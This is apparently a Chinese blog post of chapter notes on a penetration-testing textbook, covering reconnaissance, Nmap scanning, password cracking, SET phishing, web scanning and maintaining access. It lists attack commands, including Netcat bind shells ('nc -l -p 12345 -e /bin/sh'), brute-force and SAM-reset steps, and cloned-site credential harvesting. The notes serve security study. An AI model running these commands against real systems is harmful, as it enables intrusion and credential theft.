26.《渗透测试实践指南:必知必会的工具与方法》笔记

一、什么是渗透测试
1.简介
2.搭建平台
熟悉apt-get指令
3.Kali 和 BackTract Linux 工具简介
4.使用 Backtrack:启动引擎
5.黑客实验环境的搭建与使用
kali、Metasploitable、WinXP
6.渗透测试的步骤
侦察、扫描、漏洞利用、维持访问
7.接下来该做什么
了解其他的渗透测试发行版,搜集和安装工具来建立自己的Linux发行版
8.本章小结

二、侦察
1.简介
2.HTTrack:网站复制机
很容易被跟踪,关注“新闻和公告”泄露的令牌,关注招聘词,利用搜索引擎
3.Google 指令——Google搜索实践
site;allintitle;inurl;cache;filetype;exploit-db.com(google dork);inurl:login logon signin singon forgetpassword forgot reset;site intitle;公共论坛、SNS
4.The Harvester:挖掘并利用邮箱地址
theharvester -d microsoft -l 200 -b linkedin
5.Whois:获取IP地址、公司DNS主机名以及地址和电话号码等联系信息
whois.net
6.Netcraft:查看网站报告,比如IP、Web服务器的OS、DNS服务器
http://news.netcraft.com
7.Host 工具
host target_hostname
8.从 DNS 中提取信息
NS Lookup:查询DNS服务器、并可能获得DNS服务器知道的各种主机的记录。
server 8.8.8.8 set type:any
Dig:
提取信息:dig @target_ip
区域传输:dig @192.168.1.23 example.com -t AXFR
Fierce:区域传输失败时使用工具
./fierce.pl -dns example.com
9.从电子邮件服务器提取信息
发送附件为空的批处理文件,从退信中获取信息
10.MetaGooFil:提取元数据
metagoofil -d bing.com -t pdf,doc,xls -n 20 -o ./files -f results.html
11.ThreatAgent Drone 攻击:内建多种信息收集工具
(https://www.threatagent.com) 强烈建议使用
12.社会工程
通过销售人员的邮箱;U盘丢目标公司
13.筛选信息寻找可攻击的目标
完成以上后,整理收集到的侦察信息,创建一个简易的列表,记录IP地址、邮箱地址、主机名称、URL地址等,最后得到得到IP地列表
14.如何实践
找国外小公司
15.接下来该做什么
学习从Google以外搜索引擎指令;看GHDB ;Meltego;Roberlex
16.本章小结

三、扫描
1.简介
四步:用ping数据包难系统是否正在运行;用Nmap扫描系统的端口;用Nmap脚本引擎(NSE)进一步查询目标;用Nessus扫描系统漏洞。
2.ping和ping扫描
fping -a -g 172.1.1.1 172.1.2.2>hosts.txt
3.端口扫描
nmap -sT -p- -pN(TCP);-ss -p- -pN(SYN);-su,-sUV(UDP);-sx -p- -pN(XMAS);-sN -p- -pN(NULL);--script banner(NSE)
4.漏洞扫描:nessus
5.如何实践
配置两台计算机或使用虚拟机,并在目标系统上启动一些服务和程序;在子网中隐藏一个IP并找到
6.接下来该做什么
Insecure.org更多资料、OpenVAS、NeXpose

四、漏洞利用
1.简介:获得系统控制权限的过程。
2.利用Medusa获得远程服务的访问权限
medusa -h targetip -u username -p path_to_password_dictionary -M authontication_service_to_attack
3.Metasploit
利用nessus结果,攻击高危漏洞
4.John the Ripper:密码破解之王
./John /tmp/hashes.txt
5.密码重置:使用Kali的光盘或者U盘启动目标系统,然后挂载含有SAM文件的系统的硬盘驱动器
./chntpw -i/mnt/sdal/windows/system32/config/SAM
6.Wireshark:嗅探网络流量,前提是网卡运行在混杂模式下,可使用Wireshark
7.macof:生成几千个随机MAC地址,对交换机进行泛洪
macof -I ctho -s targetip
8.Armitage:像电影里那样进行黑客入侵
9.为什么要学习五个工具
10.如何实践
在实验环境中设置一个易受攻击的目标(旧版的windows和Linux)。
强烈推荐:模拟真实渗透测试的环境——De-ICE
练习Medusa:在目标计算机上启动一个远程进程,Windows启动Telnet,Linux启动SSH或FTP
练习John the Ripper和chntpw,要在被攻击计算机上配置一个不同的帐号和密码
10.接下来该做什么
了解Hydra、RainbowCrack、认真学习并使用Wireshark、Ettercap、Meterpreter、搜索Exploit-DB、熟悉stack和heap缓冲区溢出并写自己的攻击脚本、精通脚本语言(Python和Ruby)。

五、社会工程
1.简介
2.SET基础知识
se-toolkit
3.网站攻击向量
克隆一个网站,然后挂马,让人访问
4.凭据采集器
克隆一个网站,发送email给用户,用户输入用户名和密码后,会重定向到真实网站
5.SET中的其他选项
带攻击栽荷的U盘、发适垃圾邮件、Arduimo攻击载荷、伪造短信、二维码(RQCode)生成

六、基于Web漏洞利用
1.简介
2.Web入侵基础知识
Web应用入侵框架:w3af、Burp Suite、OWASP的Zed攻击代理(ZAP)、Websecurify、Paros等。
基本思路:1.拦截离开浏览器的请求的能力;2.寻找组成Web应用的所有网页、目录和其他文件的能力;3.分析Web应用响应、检查其漏洞的能力
3.扫描Web服务器:Nikto
perl nikto.pl -h 172.1.1.1 -p 1-1000
4.W3AF:找出几乎所有重要的Web漏洞,包括SQL注入、XSS、文件包含、跨站请求伪造等
5.网络爬虫:抓取目标网站
首选工具是WebScarab
6.使用 WebScarab 拦截请求
7.代码注入攻击
SQL注入
8.跨站脚本(XSS):将一个脚本注入到Web应用程序中的过程
9.Zed Attack Proxy:一网打尽
10.如何实践
学习WebGoat课程
11.接下来该做什么
关注OWASP TOP 10、《The Basic of Web Hacking:Tools and Techiniques to Attack the Web》
12.其他相关资源
时刻关注OWASP TOP TEN、学习Burp Suit

七、维持访问
1.简介
2.Netcat:允许通信和网络流量从一台计算机流向另一台计算机的工具
nc -l -p 1337;nc 192.168.18.132 1337;nc -l -p 7777 > virus.exe;nc 172.16.45.129 7777 < virus.exe;nc 192.168.18.132 50001;nc -l -p 12345 -e /bin/sh;nc.exe -L -p 12345 c:\Windowns\System32\cmd.exe
3.Netcat 神秘的家族成员——Cryptcat:对流量加密
4.Rootkit
隐藏文件或程序,并保持后门访问的隐蔽性。
5.Rootkit 的检测与防御
密切监控你放到互联网上的信息。正确配置防火墙以及其他的访问控制列表。为你的系统打上补丁。安装并使用杀毒软件。使用入侵检测系统
6.Meterpreter:无所不能
7.如何实践
熟练掌握Netcat、使用rootkit要多加小心,后门实际很少使用
8.接下来该做什么
了解Ncat和Socat、研究几个经典例子(Netbus、Back Orifice、Sub7)、学习操作系统内核

八、渗透测试总结
1.简介
2.编写渗透测试报告
综合报告。对渗透测试执行情况的概述,帮助客户理解控制或者入侵系统的成功程度。详细报告。原始输出(有需要的时候)以及支持信息
3.不应到此为止
实践并掌握本书、然后深入、访问BBS、参加CON、深入特定领域
4.接下来该做什么
看好书、参加课程、OSSTMM
5.问题
6.学无止境

你可能感兴趣的:(26.《渗透测试实践指南:必知必会的工具与方法》笔记)